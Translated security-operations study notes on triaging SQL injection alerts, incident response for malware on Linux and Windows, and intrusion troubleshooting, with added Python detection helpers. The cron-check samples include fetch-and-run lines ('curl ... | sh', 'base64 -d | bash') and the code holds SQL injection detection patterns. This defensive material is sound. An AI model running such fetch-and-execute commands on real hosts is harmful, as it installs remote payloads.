The SkyEye alert page has a details view where the actual traffic can be opened. First check whether the request headers and body contain statements commonly used in SQL injection, such as and 1=1, sleep, updatexml, etc.; if they do, it is an attack. Then look at the response: if the status code is 404 the exploit did not succeed; if it is 200, check whether the response body contains the expected query result, and if it does, the attack succeeded. For disposal, first apply to ban the IP, then ask the customer to take the affected service offline, and then fix the vulnerability. If an account was exposed, the password must be changed.
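The decision steps above as an added triage function for these notes (not code from the original page or from the SkyEye product): the request is URL-decoded and matched against the injection indicators the notes name, then the status code and response body decide whether the attempt succeeded. The response-side leak markers and the sample alerts are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Request-side indicators named in the notes (and 1=1, sleep, updatexml) plus a
# few common companions.
SQLI_PATTERNS = [
    r"\b(?:and|or)\b\s+\d+\s*=\s*\d+",            # and 1=1 / or 1=2 (boolean-based)
    r"\bsleep\s*\(", r"\bbenchmark\s*\(",          # time-based
    r"\bupdatexml\s*\(", r"\bextractvalue\s*\(",   # error-based
    r"\bunion\b\s+(?:all\s+)?select\b",
    r"\binformation_schema\b",
]
SQLI_RE = re.compile("|".join(SQLI_PATTERNS), re.IGNORECASE)

# Response-side strings that indicate a query result leaked (assumed markers,
# tune them to the application).
LEAK_MARKERS = ("information_schema", "root@", "XPATH syntax error", "mysql")


def triage_sqli_alert(request_line: str, body: str, status: int, response_body: str):
    """Apply the decision steps from the notes. Returns (is_attack, succeeded, verdict)."""
    decoded = unquote_plus(request_line) + "\n" + unquote_plus(body)
    if not SQLI_RE.search(decoded):
        return False, False, "no SQL injection pattern in request: likely false positive"
    if status == 404:
        return True, False, "attack attempt, but target path absent (404): not exploited"
    if status != 200:
        return True, False, f"attack attempt with status {status}: inspect manually"
    low = response_body.lower()
    if any(m.lower() in low for m in LEAK_MARKERS):
        return True, True, ("attack succeeded: response carries query results; "
                            "ban the IP, take the service offline, fix the vulnerability")
    return True, False, "attack attempt, 200 response without leaked data: verify manually"


# Constructed sample alerts: (request line, body, status, response body).
SAMPLES = [
    ("GET /news.php?id=1 HTTP/1.1", "", 200, "<html>news item</html>"),
    ("GET /news.php?id=1%20and%201=1 HTTP/1.1", "", 200, "<html>news item</html>"),
    ("GET /old.php?id=1%20and%201=1 HTTP/1.1", "", 404, "Not Found"),
    ("POST /login.php HTTP/1.1",
     "user=admin%27+and+updatexml(1,concat(0x7e,user()),1)--+&pass=x", 200,
     "XPATH syntax error: '~root@localhost'"),
]
```

Decoding before matching matters: the and 1=1 probe in the second sample only appears once %20 is turned back into spaces, and an encoded quote (%27) is what most alert rules would otherwise miss.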

Emergency response

The six phases of emergency response?

Preparation - Detection - Containment - Eradication - Recovery - Follow-up (summary)

How to handle an emergency involving a virus (or mining malware) or a Trojan?

It depends on the system, but the general steps are similar.

If it is Linux:

Quarantine the device first, then log in to the host.

  1. First find the process ID (PID) from the port and domain name in the alert; the command is netstat -ano

If there is no port or peer IP information, use the top command to list suspicious processes with high current CPU usage.

  2. Locate the file from the PID, then kill the process

Locate the file: ls -l /proc/PID; in the result, /proc/PID/exe links to the executable of the process

Kill the process: kill -9 PID

  3. After encrypting and preserving the file for evidence, delete it and scan with anti-virus software to check for residual files
  4. Run the extracted file in a file sandbox (such as Qi An Xin's TI platform) to see what behaviour it causes, and remediate according to that behaviour
  5. Check for backdoors such as suspicious users, suspicious files and SSH login keys, and check scheduled tasks
  6. Check how the file was uploaded; most likely via a web vulnerability or SSH brute-forcing
  7. Write the emergency response report

If it is Windows:

1. First find the process ID (PID) from the port and domain name in the alert; the command is netstat -ano

If there is no port or peer IP information, use Task Manager to list suspicious processes with high current CPU usage.

2. Locate the file from the PID, then kill the process

Locate the file: in the Details tab of Task Manager, find the PID, right-click and open the file location

Kill the process: taskkill /t /pid PID

3. After encrypting and preserving the file for evidence, delete it and scan with anti-virus software to check for residual files

4. Run the extracted file in a file sandbox (such as Qi An Xin's TI platform) to see what behaviour it causes, and remediate according to that behaviour

5. Check whether suspicious users, suspicious files or backdoors remain, check the registry for remnants, and check the startup items

6. Check how the file was uploaded

7. Write the emergency response report

The difference between /etc/passwd and /etc/shadow

/etc/passwd saves account information and generally does not save passwords 

/etc/shadow is mainly used to store passwords

Intrusion troubleshooting ideas

Already compromised

Case 1: the attacker's goal has been achieved, and the Trojan and backdoor have already been removed

1. Knowing the machine was intruded, locate the time of the intrusion

2. If the server is a cloud server, take a snapshot of it (purpose: preserve the memory state)

3. Once the time is located, check the device's traffic information and find the Trojan's connection information

4. Find the corresponding logs on the system and look for related clues

5. If the logs were deleted, use WinHex to recover the disk data, since a machine snapshot has already been taken

Case 2: the goal has not yet been achieved and data is still being sent back; the Trojan and backdoor are still running on the server

1. Take the server offline and block the attacker's IP

2. Memory forensics with Volatility: create a snapshot, dump the memory, locate the shellcode and find its IP

3. If they use a common C2 tool, the intruder's intentions can be analysed from the traffic

4. Shut down the server, or block their IP on the firewall; log in to the server and remove the shellcode

5. After restarting, enter safe mode and check the registry, scheduled tasks, services, the magnifier backdoor and the shift (sticky keys) backdoor

Attack in progress

The intruder may be taken offline while attempting the attack, after which the machine is checked.

For example: weak-password brute-forcing

1. Brute-forcing generates logs, and the logs must go to a remote log system, such as rsyslog on Linux. The advantage of a remote log system: the logs cannot be deleted by the attacker

2. Be sure to find the intruder's source IP and issue a blocking policy on the firewall

Linux system troubleshooting ideas

1. Check whether there are extra accounts in the user and password files /etc/passwd and /etc/shadow; mainly check whether each account's shell is nologin, and pay attention to any account that is not;

2. Use the who command to view currently logged-in users (tty = local login, pts = remote login), the w command to view system information and what users are doing at a given moment, and uptime to see how long the system has been up, how many users are logged in, and the load;

3. Modify /etc/profile, appending script code that records time, date, IP and command, so that the history command shows the attacker's IP, time and commands in detail;

4. Use netstat -antlp|more to analyse suspicious ports, IPs and PIDs, then check the process file path for the PID: ls -l /proc/$PID/exe or file /proc/$PID/exe ($PID is the corresponding PID);

5. Use ps to analyse the process: ps aux | grep pid

6. Use vi /etc/inittab to check the current runlevel, and through the runlevel check whether there are suspicious files in the corresponding /etc/rc.d/rc[0~6].d directory;

7. Check whether crontab scheduled tasks contain suspicious startup scripts;

8. Use chkconfig --list to check whether there are suspicious services;

9. Use grep and awk to analyse the /var/log/secure log for traces of attack;

10. chkrootkit, rkhunter and ClamAV backdoor/virus scanners can be used to check and clean Linux system files;

11. If there is a website, use D-Shield or the Hippo scanner, or manually check the code for script Trojan keywords and key functions (eval, system, shell_ex
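Steps 1, 7 and 9 of the checklist above as an added example written for these notes (not code from the original page): parse an /etc/passwd listing for accounts that can log in or that carry UID 0, flag cron lines that download, decode or run from /tmp, and count failed SSH logins per source IP from /var/log/secure lines. All three inputs are constructed samples; the cron and log patterns are assumptions chosen for the example.

```python
import re

LOGIN_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash", "/usr/bin/bash", "/usr/bin/zsh"}


def suspicious_accounts(passwd_text: str):
    """Step 1: non-root accounts with an interactive shell, and any account other
    than root whose UID is 0."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue
        user, uid, shell = fields[0], fields[2], fields[6]
        if user == "root":
            continue
        if uid == "0":
            findings.append((user, "uid 0 but not root"))
        elif shell in LOGIN_SHELLS:
            findings.append((user, f"interactive shell {shell}"))
    return findings


CRON_RE = re.compile(r"(curl|wget)\b.*(https?|ftp)://|base64\s+(-d|--decode)|/tmp/\S+\.sh",
                     re.IGNORECASE)


def suspicious_cron(cron_text: str):
    """Step 7: cron lines that download, decode, or run scripts from /tmp."""
    return [l for l in cron_text.splitlines()
            if l.strip() and not l.startswith("#") and CRON_RE.search(l)]


def failed_ssh_logins(secure_log: str) -> dict:
    """Step 9: failed password attempts per source IP from /var/log/secure lines."""
    counts = {}
    for m in re.finditer(r"Failed password for (?:invalid user )?\S+ from (\d+\.\d+\.\d+\.\d+)",
                         secure_log):
        counts[m.group(1)] = counts.get(m.group(1), 0) + 1
    return counts


# Constructed samples (not from a real host); 198.51.100.7 is a placeholder address.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:1001:1001::/home/backup:/bin/bash
toor:x:0:0::/root:/bin/bash
"""
SAMPLE_CRON = """\
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh
*/10 * * * * echo aGVsbG8= | base64 -d | bash
"""
SAMPLE_SECURE = """\
Mar  3 10:01:02 web1 sshd[2201]: Failed password for root from 198.51.100.7 port 50211 ssh2
Mar  3 10:01:04 web1 sshd[2201]: Failed password for root from 198.51.100.7 port 50212 ssh2
Mar  3 10:01:05 web1 sshd[2203]: Failed password for invalid user admin from 198.51.100.7 port 50213 ssh2
Mar  3 10:02:10 web1 sshd[2210]: Failed password for alice from 203.0.113.5 port 40001 ssh2
Mar  3 10:02:30 web1 sshd[2212]: Accepted password for alice from 203.0.113.5 port 40002 ssh2
"""
```

On the samples, the passwd check surfaces the extra bash account and the second UID-0 user, the cron check flags the two download/decode lines, and the log count separates the brute-forcing source from a single failed login by a real user.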

Webshell lookup

In a Windows environment use D-Shield (D盾)

In a Linux environment use the Linux version of Hippo (河马)

The difference between Cookie and Session

The cookie is stored on the machine, and the session is stored on the server

Both Cookie and Session are mechanisms for tracking user authentication and status, but Cookie stores data on the client side, while Session stores data on the server side

Reprinted from: blog.csdn.net/m0_64376527/article/details/130200871